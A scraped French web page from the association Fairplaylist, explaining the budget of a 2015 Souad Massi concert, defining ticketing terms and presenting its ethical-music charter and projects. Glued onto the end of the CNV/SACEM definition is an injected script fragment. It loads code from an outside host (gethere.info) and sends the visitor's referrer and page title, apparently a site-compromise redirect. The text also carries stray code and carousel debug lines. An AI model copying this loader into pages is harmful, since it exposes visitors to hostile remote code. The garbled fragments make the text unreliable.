Name Value
owlItems.length 16
currentItem 7
prevItem 6
visibleItems 7,8,9,10,11
dragDirection:

Nos Réalisations

Nos activités

Une billetterie solidaire…

La billetterie mise à nu

L’association Fairplaylist cherche à vous aider à comprendre l’économie d’un concert. Vous trouverez ci-dessous les principaux éléments financiers de la manifestation. De plus, sur le lieu de l’événement, un affichage sera mis en place et vous donnera davantage d’éléments.

Exemple avec le concert SOUAD MASSI au festival de Ménilmontant 2015

billeterie-20153

Coût global de la soirée : 1545,70 euros 

Au Petit Bain comme dans beaucoup d’autres lieux, les recettes du bar ne rentrent pas directement dans le budget de la soirée mais sont redistribuées pour couvrir les salaires des équipes ayant travaillé sur les concerts (coordinatrice musique, administratrice, équipe de communication, staff du bar) et d’autres frais de fonctionnement du Petit Bain (mise à disposition de la salle, électricité, maintenance, etc.).

Définitions :

· Break : C’est le nombre de places à vendre avant de pouvoir dire : « ouf, notre budget est à l’équilibre ». Pour cette soirée, il nous faudrait 413 pré-ventes pour atteindre le break.

· Co-réalisation : Le contrat de co-réalisation est un contrat conclu entre un producteur et un organisateur de spectacles. Ces derniers se partagent les recettes de la billetterie et doivent payer chacun une partie des charges de la soirée. Le producteur prend en charge le coût artistique de la soirée et l’organisateur toutes les autres charges.

· Organisateur : C’est Fairplaylist !

· Producteur : C’est U-Turn Touring !

· Sécurité : C’est les gentilles personnes qui fouillent ton sac, te demandent de ne pas sortir avec ton verre et appliquent les consignes de sécurité en cas de pépin pour que tu passes une bonne soirée

· Catering : C’est les ptits plats préparés par nos cuistots pour nourrir les artistes le soir de leur concert.

· Hébergement : C’est l’endroit où l’on fait dormir les artistes après leur concert (hôtel, chez l’habitant).

· Coût artistique : C’est l’argent qui sert à rémunérer les artistes et le producteur.

· Technique : C’est ceux qui s’occupent du son et de la lumière pendant les balances et les concerts.

· Communication : Vous avez eu l’info pour ce concert (newsletter, site internet, Facebook, Twitter, flyers, etc.) ? C’est tout ça, et l’équipe qui s’en occupe.

· Commission de billetterie : On vous a dit 16€ (Hors Commission) en prévente et vous avez payé 16,99€ chez Weezevent ? Les 99 centimes, c’est la part prélevée par Weezevent pour se rémunérer et assurer la maintenance de leur logiciel de billetterie. Idem pour les billetteries FNAC, Digitick, etc.

· CNV et SACEM : C’est des taxes que doit payer l’organisateur sur les recettes de billetterie. C’est obligatoire, on n’y échappe pas, et parfois, on peut leur demander des subventions. Plus d’infos sur le CNV et la SACEM.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »;

Nos réalisations

Le Cahier des charges « Musique éthique »

Charte musique ethique

Cette charte a été élaborée en 2006-2007 à l’initiative des associations Fairplaylist, Dyade Art et Développement, d’un producteur (Utica), de l’apport de personnalités qualifiées (Charlotte Dudignac, François Mauger1), ainsi que la consultation de musiciens, de disquaires indépendants, etc. Elle est une première tentative d’élaboration collective de critères d’équité et de solidarité applicables à la filière du disque avec des critères dits « impératifs » et des critères de progrès.

L’Appel pour une musique solidaire

Lancé au printemps 2009, part du postulat que les valeurs communes d´équité et de solidarité peuvent et doivent être appliquées concrètement à la filière musicale. Les signataires de cet appel s’engagent donc à mener ensemble une réflexion sur les règles du jeu, par la création d’un groupe de travail conduisant à une garantie de pratiques solidaires entre les membres.

Vous pouvez signer ici : Appel pour une musique solidaire

La compilation « Le son de Ménilmontant » 

Sortie en 2008, elle regroupe des groupes locaux parisiens. Elle a été réalisée en respectant la charte : enregistrée dans un studio utilisant de l’électricité verte. La pochette du disque est en matière recyclée (carton), encre végétale et colle sans solvant.

Un premier réseau de distribution

Suite à la compilation un réseau de distribution alternatif a été mis en place au sein de magasins de commerce équitable et biologique (Artisans du Monde, Biocoop, Altermundi), de boutiques de proximité (boutiques de mode, Bazar Ethique) et de disquaires et libraires indépendants et engagés. En France, 55 points de vente ont été partenaire. Tous les points de vente ont joué le jeu de la transparence et du prix unique (18€ et 20€ pour le consommateur final) mis en valeur dans la charte « musique éthique ».

Et aussi le Festival de Ménilmontant


} else {

Inscrivez-vous à notre Newsletter